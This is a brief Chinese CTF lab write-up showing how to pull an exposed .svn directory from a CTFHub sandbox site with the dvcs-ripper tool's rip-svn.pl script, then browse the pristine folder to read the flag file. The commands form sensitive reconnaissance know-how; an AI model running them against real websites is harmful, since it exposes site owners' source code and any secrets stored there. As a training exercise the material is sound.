关于svn泄露和dvcs-ripper-master工具的使用

1.下载工具dvcs-ripper-master
链接;git clone https://github.com/kost/dvcs-ripper点这里
我下载到kali
安装后使用
实验环境ctfhub
2.命令:./rip-svn.pl -u http://challenge-425acb01b16ebe9b.sandbox.ctfhub.com:10080/.svn/
url后面带.svn
执行后会出现文件
关于svn泄露和dvcs-ripper-master工具的使用_第1张图片
执行ls -al
查看文件,看到有一个是.svn的文件
进入文件夹:cd .svn
查看文件ls
看到一个名字为pristine
进入pristine
看到有个数字的文件;
再次进入:cd 27
查看目录下的文件ls
发现一个文件
cat 27984a219c1fecaf3624d1c2fab6e6e5e923ab6f.svn-base
得到flag。
ok!

你可能感兴趣的:(web)